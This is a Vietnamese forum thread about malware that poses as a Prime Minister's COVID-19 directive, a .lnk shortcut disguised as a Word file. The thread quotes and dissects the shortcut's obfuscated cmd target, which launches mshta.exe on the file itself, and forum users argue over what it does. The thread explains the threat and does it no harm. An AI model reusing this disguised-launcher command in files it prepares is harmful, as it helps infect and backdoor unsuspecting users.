Xuất hiện mã độc mạo danh chỉ thị của Thủ tướng về dịch COVID-19 | VN-Zoom | Cộng đồng Chia Sẻ Kiến Thức Công Nghệ và Phần Mềm Máy Tính

Adblocker detected! Please consider reading this notice.

We've detected that you are using AdBlock Plus or some other adblocking software which is preventing the page from fully loading.

We need money to operate the site, and almost all of it comes from our online advertising.

If possible, please support us by clicking on the advertisements.

Please add vn-z.vn to your ad blocking whitelist or disable your adblocking software.

×

Xuất hiện mã độc mạo danh chỉ thị của Thủ tướng về dịch COVID-19

Hacker Is Real

Hãy like thay vì post thanks ❤❤❤!
Mã độc được chèn trong một file word với tiêu đề: “Chi Thi cua thu tuong nguyen xuan phuc” liên quan đến công tác phòng chống dịch Covid-19, nhằm đánh lừa người dùng.
Thông tin từ Tập đoàn công nghệ CMC cho biết, lợi dụng tình hình căng thẳng của dịch COVID-19, mẫu mã độc giống với một số mẫu do nhóm tin tặc Panda phát triển (từng tấn công các tổ chức tại Việt Nam năm 2019), được phát hiện đã thực hiện mạo danh văn 3 bản thông báo của chính phủ về tình hình dịch.
Xuất hiện mã độc mạo danh chỉ thị của Thủ tướng về dịch COVID-19

Cụ thể, mã độc được chèn trong một file word với tiêu đề: “Chi Thi cua thu tuong nguyen xuan phuc” nhằm đánh lừa người dùng. File mẫu là một file shortcut có phần mở rộng là “.lnk” được ẩn dưới dạng một file winword nhằm đánh lừa người dùng do đuôi “.lnk” sẽ được Windows ẩn đi.
Tuy nhiên, theo các chuyên gia, file Word này sử dụng một target đáng ngờ. Thông thường target của shorcut thường trỏ đến một thư mục hoặc file đích, nhưng target của mẫu này lại chứa đoạn command có dạng: "%comspec% /c for %x in (%temp%=%cd%) do for /f "delims==" %i in (‘dir "%xChi Thi cua thu tuong nguyen xuan phuc.lnk" /s /b’) do start m%windir:~-1,1%hta.exe "%i" .
Nếu được thực thi, mã độc nói trên sẽ tự tạo ra các bản sao, đồng thời tự kích hoạt khả năng chạy mỗi khi khởi động máy tính. Bên cạnh đó, mã độc này sẽ tạo backdoor cho phép kẻ tấn công có thể thực thi lệnh từ xa, đồng thời hỗ trợ chạy nhiều lệnh khác nhau như tải file, lấy thông tin máy tính và người dùng.
"Bằng cách sử dụng nhiều kỹ thuật tấn công khác nhau và làm rối trong khi thực thi cho thấy rằng người đứng sau phát triển mã độc đã đầu tư không ít thời gian để nghiên cứu mục tiêu và phát triển phương pháp tấn công cho phù hợp" - các chuyên gia của CMC nhận định.
 

Mtdev


Junior Moderator
nghĩ chán cho các bác bên cmc quá.

C++:
"%comspec% /c for %x in (%temp%=%cd%) do for /f "delims==" %i in (‘dir "%xChi Thi cua thu tuong nguyen xuan phuc.lnk" /s /b’) do start m%windir:~-1,1%hta.exe "%i"
Đây thực chất là nó copy file vào thư mục temp sau đó chạy file hta.exe có trên máy.

phân tích code trên:

%comspec% => chính là chạy cmd

Bash:
 for %x in (%temp%=%cd%) do for /f "delims==" %i in (‘dir "%xChi Thi cua thu tuong nguyen xuan phuc.lnk" /s /b’)
cái đoạn này chính là copy file vào thư mục temp.

C++:
start m%windir:~-1,1%hta.exe "%i
=> chạy file hta.exe

Mã này các bố bảo
Bằng cách sử dụng nhiều kỹ thuật tấn công khác nhau và làm rối trong khi thực thi cho thấy rằng người đứng sau phát triển mã độc đã đầu tư không ít thời gian để nghiên cứu mục tiêu và phát triển phương pháp tấn công cho phù hợp
thì đến ạ các bác bên cmc ăn gạo ít thôi cho máu nên não. cái này ngồi viết chưa tới vài phút là song
 

dammage

Rìu Chiến
nghĩ chán cho các bác bên cmc quá.

C++:
"%comspec% /c for %x in (%temp%=%cd%) do for /f "delims==" %i in (‘dir "%xChi Thi cua thu tuong nguyen xuan phuc.lnk" /s /b’) do start m%windir:~-1,1%hta.exe "%i"
Đây thực chất là nó copy file vào thư mục temp sau đó chạy file hta.exe có trên máy.

phân tích code trên:

%comspec% => chính là chạy cmd

Bash:
 for %x in (%temp%=%cd%) do for /f "delims==" %i in (‘dir "%xChi Thi cua thu tuong nguyen xuan phuc.lnk" /s /b’)
cái đoạn này chính là copy file vào thư mục temp.

C++:
start m%windir:~-1,1%hta.exe "%i
=> chạy file hta.exe

Mã này các bố bảo

thì đến ạ các bác bên cmc ăn gạo ít thôi cho máu nên não. cái này ngồi viết chưa tới vài phút là song
nếu tui hông lầm thì đoạn script này chỉ truyền đường dẫn cho cái file hta nó chạy thôi chứ đâu có copy tấn công gì đâu ta, mọi sự là nằm trong cái file exe đó, đọc kĩ lại hình như ý của chuyên gia cũng hông phải đề cập tới đoạn script đó, là do thằng báo nó sắp đoạn dễ gây hiểu lầm thôi, bên cmc tui có quen mấy thằng, hông nghĩ tụi nó thiếu máu não tới vậy mức đâu

mà công nhận đưa đoạn script kiểu đó lên khè mấy con gà sợ xỉu rất hiệu quả
7L1XX2F.gif
 

tvthoi1984

Rìu Vàng Đôi
Hôm qua tự nhiên mình nhận được tin nhắn zalo từ 1 người bạn mà đã lâu không liên lạc.
Lạ cái là nó gửi đính kèm file nCovi.apk
Thấy nghi nghi, không biết có bác nào muốn mổ ruột em nCovi.apk này không?
 

mientay

Gà con
Bọn phá hoại thì đâu đâu cũng có và nghĩ ra lắm trò vô đạo đức. Giữa lúc niềm tin đang không có mà bọn nó...
 


Top